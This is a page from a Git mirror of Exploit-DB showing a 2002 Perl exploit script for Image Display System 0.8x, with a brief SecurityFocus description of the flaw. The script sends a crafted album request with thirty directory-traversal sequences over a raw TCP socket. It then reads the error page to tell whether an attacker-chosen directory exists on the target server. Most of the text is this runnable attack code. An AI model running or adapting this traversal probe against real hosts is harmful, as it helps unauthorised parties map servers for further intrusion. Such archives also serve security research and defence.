bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/cgi/webapps/21487.pl
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

96 lines
No EOL
2.1 KiB
Perl
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/4870/info
IDS (Image Display System) is an web based photo album application written in Perl. IDS is freely available and is maintained by Ashley M. Kirchner.
Users can confirm the existence and location of various directories residing on the IDS host. This is accomplished when a request for a directory and album name is sent to the host containing numerous '../' character sequences. The error page returned will indicate to the attacker whether the specified path is a valid directory or not.
#!/usr/bin/perl -w
#
# ids-inform.pl (05/27/2002)
#
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existance of specified directory.
#
# By: isox [isox@chainsawbeer.com]
#
#
# usage: self explanitory
#
# my spelling: bad
#
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.
#
#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net
#
#
#################
# Advertisement #
#################
#
# Going to Defcon X this year? Well come to the one and only Dennys at Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox. Check 0xc0ffee.com for
# more information.
#
$maxdepth = 30;
&Banner;
if ($#ARGV < 3) {
die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\n");
}
for($t=0; $t<$maxdepth; $t++) {
$dotdot = "$dotdot" . "/..";
}
$query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]\n\n";
$blahblah = &Directory($query, $ARGV[2], $ARGV[3]);
if($blahblah =~ /Sorry, invalid directory name/) {
print("$ARGV[0] Exists.\n");
} else {
print("$ARGV[0] Does Not Exist.\n");
}
exit 0;
sub Banner {
print("IDS Information Disclosure Exploit\n");
print("Written by isox [isox\@chainsawbeer.com]\n\n");
}
sub Directory {
use IO::Socket::INET;
my($query, $host, $port) = @_;
$sock = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => $port,
Timeout => 8,
Proto => 'tcp'
);
if(!$sock) {
die("sock: timed out\n");
}
print $sock $query;
read($sock, $buf, 8192);
close($sock);
return $buf;
}
<-- EOF -->
Reference in a new issue View git blame Copy permalink